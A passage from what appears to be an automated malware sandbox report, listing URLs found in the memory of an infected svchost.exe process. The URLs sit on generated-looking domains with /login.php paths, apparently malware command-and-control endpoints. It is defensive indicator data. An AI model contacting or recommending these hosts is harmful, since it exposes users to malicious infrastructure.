Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668590498.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujywep.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujywiv.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656025861.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669257529.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydyg.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654531739.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655091377.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygil.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjev.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumylel.com/
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/login.phpu
Source: svchost.exe, 00000002.00000003.1877393077.0000000003346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915790938.0000000003346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559736055.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958175444.000000000333F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840736100.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950440399.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074885906.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881070405.0000000003346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789844614.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1855027098.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1733471052.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1851540706.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076179545.0000000003346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1810534673.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1733402411.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumypog.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675053991.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677637599.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683902342.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677712725.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681955715.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyxiv.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyboq.com/http://lysynaj.com/http://pupyboq.com/0
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupybul.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycop.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870012062.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydig.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjap.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylug.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684006366.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1678100644.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1943198717.000000000CD30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymol.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypiv.com/
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytiq.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupywyv.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxup.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxup.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycap.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667816249.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675053991.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677637599.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683902342.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677712725.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681955715.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667454914.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycaq.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycul.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624452735.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydip.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682996200.0000000000826000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 